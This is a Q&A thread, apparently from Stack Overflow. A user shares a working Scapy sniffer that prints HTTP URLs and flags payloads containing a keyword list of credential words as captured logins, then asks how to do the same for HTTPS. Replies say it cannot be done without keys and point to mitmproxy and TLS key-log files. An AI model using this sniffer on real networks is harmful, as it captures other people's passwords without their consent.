1

I have been able to use this to filter and view HTTP requests and packets so far. How do I include additional support to similarly view HTTPS packets?

#!/usr/bin/env python

import scapy.all as scapy
from scapy.layers import http


def sniff(interface):
    scapy.sniff(iface=interface, store=False, prn=process_sniffed_packet)


def get_url(packet):
    return packet[http.HTTPRequest].Host + packet[http.HTTPRequest].Path


def get_login_info(packet):
    if packet.haslayer(scapy.Raw):
        load = packet[scapy.Raw].load
        keywords = ['username', 'uname', 'user', 'id', 'key', 'email', 'email-id', 'login', 'password', 'pass', "passwd"]

        for keyword in keywords:
            if keyword in load:
                return load


def process_sniffed_packet(packet):
    if packet.haslayer(http.HTTPRequest):
        url = get_url(packet)
        print("[+] HTTP Request >>> " + url)

        login_info = get_login_info(packet)
        if login_info:
            print("\n\nEntered login credentials >>> " + login_info + "\n\n")


sniff("eth0")
jfleach
  • 501
  • 1
  • 8
  • 21
Vineeth B V
  • 75
  • 6

1 Answers1

1

Short answer: You can't.

You probably need to look into HTTPS a lot more. Since everything is encrypted, you won't see anything without the private keys. See https://security.stackexchange.com/a/83039

Have a look at mitmproxy if you're doing this for a debugging purpose, or this if they're using RSA on a key you have compromised. (I doubt you're doing any of those)

Cukic0d
  • 5,111
  • 2
  • 19
  • 48
  • Usually NSS Key Log files are used to get private keys. Which can be acquired through setting environment variable in OS: https://developer.mozilla.org/en-US/docs/Mozilla/Projects/NSS/Key_Log_Format Here is nice discussion to proceed: https://stackoverflow.com/questions/57498386/sslkeylogfile-environment-variable-doesnt-populate-any-text-file – Rustam A. Jan 02 '22 at 17:04